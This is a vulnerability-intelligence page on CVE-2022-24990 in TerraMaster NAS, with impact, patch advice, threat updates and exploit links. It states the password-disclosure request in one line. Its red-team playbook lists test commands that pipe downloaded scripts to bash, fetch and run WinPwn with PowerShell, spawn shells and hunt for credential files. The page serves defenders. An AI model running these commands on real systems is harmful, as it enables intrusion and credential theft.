CVE-2022-24990
Overview
This vulnerability is an information disclosure flaw caused by improper access control in the TerraMaster NAS operating system (TOS) version 4.2.29 and earlier. The root cause lies in the unauthenticated exposure of sensitive configuration data via a specific API endpoint. The affected component is the web-based module/api.php interface, which processes requests containing a particular User-Agent header to retrieve administrative credentials.
Vulnerability Description
TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.
Impact
An unauthenticated remote attacker can retrieve the administrative password of the TerraMaster NAS device by exploiting this vulnerability. No prior access or user interaction is required to perform the attack. With the administrative credentials exposed, the attacker can gain full control over the device, enabling unauthorized access to stored data, configuration changes, and potential lateral movement within the network. This leads to a complete compromise of the affected NAS system and exposure of sensitive information.
Solution
Upgrade TerraMaster NAS devices to version 4.2.30 or later, as this version addresses the authentication bypass vulnerability in the module/api.php endpoint. Refer to the official TerraMaster forum and vendor security advisories for detailed patch instructions. Additionally, monitor the Broadcom Security Center and projectdiscovery/nuclei-templates repository for updated detection and mitigation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the TerraMaster NAS operating system, specifically in versions 4.2.29 and earlier, arises from improper handling of user input in the API endpoint. By sending a specially crafted request with the "User-Agent: TNAS" header to the module/api.php?mobile/webNasIPS endpoint, an attacker can elicit a response that inadvertently reveals the administrative password stored in the PWD field. This flaw highlights a critical oversight in input validation and response management, as sensitive information is exposed without adequate authentication or authorization checks. The lack of security measures to obfuscate or encrypt the password further exacerbates the risk, allowing attackers to exploit this vulnerability with minimal effort.
Exploitation of this vulnerability can occur remotely, making it particularly concerning for organizations that rely on TerraMaster NAS devices for data storage and management. An attacker could leverage this weakness to gain unauthorized access to the administrative interface of the NAS, subsequently allowing them to manipulate settings, access sensitive data, or even deploy further attacks within the network. Scenarios could include an attacker targeting a specific organization known to use TerraMaster devices, or broader scans for vulnerable systems across the internet. Once the administrative password is obtained, the attacker could potentially pivot to other systems, escalating their access and impact.
The real-world implications of this vulnerability are significant, particularly for businesses that store sensitive information on their NAS devices. The exposure of administrative credentials can lead to data breaches, loss of intellectual property, and potential regulatory repercussions depending on the nature of the data compromised. Additionally, the reputational damage that could result from a successful attack can have long-lasting effects on customer trust and brand integrity. Organizations may face financial losses due to remediation efforts, legal fees, and potential fines imposed by regulatory bodies for failing to protect sensitive data adequately.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to conduct regular security assessments and vulnerability scans to identify any instances of the affected TerraMaster NAS operating systems within the network. Monitoring network traffic for unusual patterns, such as requests to the vulnerable API endpoint, can also help identify potential exploitation attempts. Additionally, organizations should ensure that they are running the latest version of the TerraMaster operating system, as updates may include patches that address this vulnerability. Implementing network segmentation can further limit the exposure of NAS devices to the internet, reducing the attack surface.
In conclusion, the vulnerability present in the TerraMaster NAS operating system represents a significant risk to organizations utilizing this technology. The ease of exploitation and the potential for severe consequences necessitate immediate attention from cybersecurity teams. By adopting proactive detection and mitigation strategies, organizations can better safeguard their sensitive data and maintain the integrity of their IT infrastructure. Continuous monitoring and timely updates will be essential in defending against this and similar vulnerabilities in the future.
The CVSS score for CVE-2022-24990 has been revised upward from 7.5 to 9.8, reflecting a reassessment of the vulnerability’s criticality based on emerging evidence. This change coincides with the inclusion of the vulnerability in the Known Exploited Vulnerabilities (KEV) catalog, underscoring its active exploitation in the wild, including documented use by ransomware operators. CSURFACE threat intelligence has identified a steady presence of multiple publicly available proof-of-concept exploits, which lowers the barrier for adversaries to weaponize this flaw. Although the EPSS score remains stable at a high level, the KEV listing and ransomware association elevate the urgency for defenders to prioritize detection and response efforts. This recalibration signals that the threat posed by CVE-2022-24990 is both imminent and severe, increasing the likelihood of compromise in environments running vulnerable TerraMaster OS versions. Consequently, the overall risk rating for this vulnerability should be considered critical, with a heightened potential for impactful exploitation campaigns targeting exposed assets.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-24990, with telemetry indicating a significant uptick in adversary activity leveraging this vulnerability. This surge coincides with the emergence of multiple new proof-of-concept exploits publicly available on GitHub, broadening the attack surface and lowering the barrier to weaponization. The continued association of this vulnerability with ransomware operations underscores its attractiveness to threat actors seeking initial access or lateral movement within TerraMaster NAS environments. Although the EPSS score remains stable at an elevated level, the qualitative increase in detection frequency and exploit availability amplifies the urgency for defenders to monitor and respond to potential intrusions. Consequently, the threat level for CVE-2022-24990 should be reassessed as increasingly critical, reflecting both the heightened likelihood of exploitation and the expanding toolkit adversaries possess to capitalize on this flaw.
Update 3 — June 15, 2026
CSURFACE threat intelligence has detected a modest increase in activity related to CVE-2022-24990, with our telemetry indicating a slight rise in exploitation attempts targeting TerraMaster NAS devices. Despite a marginal decline in the EPSS score, the sustained presence of multiple publicly available proof-of-concept exploits continues to lower the barrier for adversaries, including ransomware operators, to leverage this vulnerability. This subtle uptick in detection frequency, combined with the persistent availability of exploit code, signals that threat actors remain actively interested in this flaw for initial access or lateral movement. Consequently, the threat level for CVE-2022-24990 remains critically high, underscoring the ongoing risk posed to affected environments and the necessity for vigilant monitoring.
Update 4 — July 05, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2022-24990, indicating increased adversary engagement with this vulnerability. Although the official CVSS score has been revised downward to 7.5, reflecting a recalibration of the vulnerability’s impact parameters, the practical risk remains elevated due to the sustained availability of multiple proof-of-concept exploits and the integration of this flaw into automated attack frameworks, including Metasploit modules. Our telemetry confirms that threat actors, including ransomware affiliates, continue to leverage this vulnerability as a vector for initial access and lateral movement within TerraMaster NAS environments. The slight surge in exploitation attempts underscores persistent attacker interest and suggests that the vulnerability remains a viable target in the wild. Consequently, despite the CVSS adjustment, the overall threat level should be considered critically high, as the operational exploitation landscape has not diminished and may in fact be intensifying.
Update 5 — August 02, 2026
CSURFACE threat intelligence has identified a modest increase in exploitation attempts targeting CVE-2022-24990, reflecting sustained adversary interest despite a slight decline in the EPSS score. This persistence is underscored by the continued availability and dissemination of multiple proof-of-concept exploits on public repositories, which lowers the barrier for threat actors, including ransomware affiliates, to leverage this vulnerability for initial access and lateral movement within TerraMaster NAS environments. While the uptick in detection activity is not dramatic, it signals that the vulnerability remains actively targeted and operationally relevant. Consequently, defenders should recognize that the threat landscape surrounding CVE-2022-24990 remains dynamic and that the risk level continues to warrant a high priority designation due to ongoing exploitation potential and the involvement of financially motivated threat groups.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Terra-Master | Terramaster Operating System | All |
cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989
exploits/linux/http/terramaster_unauth_rce_cve_2022_24990
|
- | Unknown | - | View |
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
lishang520/CVE-2022-24990
CVE-2022-24990信息泄露+RCE 一条龙
|
lishang520 | 38 | 16 | 2022-03-20 | View |
|
0xf4n9x/CVE-2022-24990
CVE-2022-24990 TerraMaster TOS unauthenticated RCE via PHP Object Instantiation
|
0xf4n9x | 12 | 6 | 2022-03-20 | View |
|
VVeakee/CVE-2022-24990-POC
仅仅是poc,并不是exp
|
VVeakee | 4 | 6 | 2022-03-10 | View |
|
ZZ-SOCMAP/CVE-2022-24990
TerraMaster TOS Unauthenticated Remote Command Execution(RCE) Vulnerability CVE-2022-24990
|
ZZ-SOCMAP | 3 | 2 | 2022-04-12 | View |
|
jsongmax/terraMaster-CVE-2022-24990
|
jsongmax | 4 | 0 | 2022-10-17 | View |
|
Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-
CVE-2022-24990:TerraMaster TOS 通过 PHP 对象实例化执行未经身份验证的远程命令
|
Jaky5155 | 2 | 0 | 2022-03-08 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-24990 |
| forum.terra-master.com |
GitHub CVE
|
https://forum.terra-master.com/en/viewforum.php?f=28 |
| broadcom.com |
GitHub CVE
|
https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732 |
| github.com |
GitHub CVE
|
https://github.com/0xf4n9x/CVE-2022-24990 |
| octagon.net |
GitHub CVE
|
https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/172904/TerraMaster-TOS-4.2.29-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-24990 |